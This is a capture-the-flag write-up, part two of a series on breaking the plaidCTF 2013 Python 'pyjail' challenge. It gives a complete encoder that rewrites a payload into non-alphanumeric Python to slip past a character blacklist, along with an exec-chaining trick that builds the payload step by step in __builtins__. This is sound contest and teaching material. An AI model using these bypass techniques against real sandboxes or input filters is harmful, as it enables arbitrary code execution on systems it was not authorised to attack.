Note

This is part two of the two part process describing how we broke the pyjail challenge on plaidCTF 2013. The first part described how we broke the sandbox. This part describes how we circumvented the nonalpha stuff.

I will now describe how we encoded our payload and what we did to make it work even though our encoder sucked badly :-)

Recall the code in the last blogpost. The most evil two lines are these:

#Dick move: you also have to only use the characters that my solution did.
inp = inp.translate(ident, '!"#$&*+-/0123456789;=>[email protected]\\^abcdefghijklmnopqrstuvwxyz|')

Basically translate does nothing... well, besides deleting all those wonderful chars you see up there. You will really miss them when you try to write Python code.

Let’s create a list of allowed chars: ()[]{}~<,_%`.:' and a lot of unicode chars that aren’t covered by the blacklist up there.

Nonalphanumeric Python code

Nonalphanumeric Python code isn’t actually so hard to understand if you understand the underlying tricks it uses. In Python versions 2.x there is the backtick operator which is an equivalent to calling repr of something.

Using `1` gives you the output of repr(1): The string '1'.

Using `True` gives you the output of repr(True): The string 'True'.

How can we create True, False and numbers?

[]<[] == False
[]<'' == True

Turns out that numbers can be created easily out of True and False since they represent 1 and 0. We use the unary operator ~ and a left shift << to create arbitrary numbers:

~([]<'') == -2
~(([]<'')<<([]<'')) == -4

and so on...

The next trick you have to understand is the format string '%c' which, given a number, translates it into its ASCII equivalent.

'%c' % 0x61 == 'a'

How can we create the c? Clearly its an alphanumeric character. Turns out that when calling repr on unicode strings returns their hex-encoded form:

`'¬'` == "'\\xc2\\xac'"

Now, here we go: We can extract a 'c' from that and prepend a '%':

'%' + `'¬'`[3] == '%c'

Wait. '+' is not allowed in this challenge. Wow, that was the real dick move ;-)

Since we want a long string full of '%c%c%c...' to create arbitrarily long strings we have to come up with another tactic to create it. Python has a really mighty substring syntax and we can use that to our advantage:

`'¬%'`[::-1] == "'%cax\\2cx\\'"

Do you see it? We have a %c now and could cut that out and then use '*' to make more of it... but... wait... duh, '*' is forbidden, too :-(

We used even more magic to create an arbitrarily long string out of '%c'.

`'¬¬%%¬¬%%¬¬%%¬¬%'`[:-1:][::-9] == '%c%c%c%c'

Do you know why it works? Try it out and play with it! We can prepend a '¬¬%%' to get an additional '%c'.

That are the little things which have to be combined together to create a nonalphanumeric string which passes the checks. Now comes the fun part: Since we sure do not want to encode the payload by hand, we have to write a little encoder. Creating numbers was actually the hardest problem for me, but I just recursively bruteforced combinations of the unary operator and shifts until a certain level and took the shortest ones. I know, I’m a lazy bastard.

Here’s the code:

#coding: utf-8
import sys
import string

TRUE = "([]<'')"
FALSE = "([]<[])"
# globals, fuck yeah
numbers = {0: FALSE, 1: TRUE}
allowed = "()[]{}~<,_%`.:"

def fill_numbers_(new, level):
   num = eval(new)
   if num not in numbers or len(new) < len(numbers[num]):
       numbers[num] = new
       fill_numbers(new, level + 1)

def optimize_numbers():
   for c in allowed:
       numbers[ord(c)] = "'%s'" % c
   for c in string.digits:
       if c == '1':
           numbers[ord(c)] = "`~~%s`" % TRUE
       elif c == '0':
           numbers[ord(c)] = "`~~%s`" % FALSE
       else:
           numbers[ord(c)] = "`%s`" % numbers[int(c)]

def fill_numbers(pre, level):
   if level > 11:
       return
   fill_numbers_('~' + '(' + pre + ')' if pre != TRUE else '~' + pre, level)
   fill_numbers_(pre + '<<' + TRUE, level)

def encode(text):
   result = "`'" + r"¬¬%%" * (len(text) - 1) + r"¬¬%'`[:~([]<[]):][::~((([]<'')<<([]<''))<<(([]<'')<<([]<'')))]%"
   result += '(%s)' % ','.join(numbers[ord(c)] for c in text)
   return result

if __name__ == '__main__':
   fill_numbers(TRUE, 0)
   optimize_numbers()
   result = encode(sys.argv[1])
   print('Length: %d\n' % len(result))
   print(result)

It takes a string as the first command line parameter and encodes it. There are some more tricks here and there to make the output shorter, but as I will explain now, it still sucks ;-)

It’s time to look at the point of the code we’re actually exploiting here:

exec 'a=' + _eval(inp, {}) in {}

inp is our nonalpha code, but there is a lot of crazy stuff around it. The exec assigns to a variable a and the result of the exec call will be checked for an occurrence as a key in the empty dictionary. In my opinion this check could never possibly pass. The eval call takes care that our nonalphanumeric code can create the actual exploit code. The easiest way to do it is to assign something short to a and then append a command with the semicolon: a=1;EXPLOIT. Easy enough. Let’s encode our payload (from Part I).

Length: 5453

...

Actually it is time to admit something: I have done some bad things in my life. Like, for example when I created “The Sandboxed Terminal” (which the author took as an inspiration for this challenge) I introduced a 1900 chars limit for the solution. Turns out the author just liked that limit and put it into his challenge, too. Bummer.

So, what could we do now? We could not come up with an encoder that saves about 4k chars. Welll, not me at least. We had another idea then. How about adding parts of the payload to a variable and just updating it with every nonalpha code we send to the server. We could build our payload incrementally then and exec it in the exec.

Exec in the exec!

Recall that the whole code runs in a while loop and should therefore have a consistent state. The in {} part of the code made that a bit harder than expected but we could get around that. Take a look at the examples:

>>> exec 'a=1;b=2'
>>> b
2
>>> exec 'a=1;b=2' in {}
>>> b
Traceback (most recent call last):
 File "<stdin>", line 1, in <module>
NameError: name 'b' is not defined

So the in {} destroys our changes. Damn you! Can we hide our changes somewhere so that they are not prevented from being made? Yes we can.

exec 'a=1;__builtins__[7]=2' in {}

Do not try this at home. No, but seriously it only works because of the circumstances of the python jail. __builtins__ = None is the magic line here. It completely destroys our builtins, but it also makes an empty dictionary out of it. Apparently. Why? Because.

Anyways, we could now just create a string __builtins__[7] and incrementally add our payload to it. At the end there was a great exec 'a=1;exec __builtins__[7]' in {}.

The flag was 'god_that_was_annoying'. Yes it was. We also learned some new stuff and our brains needed some cooling afterwards.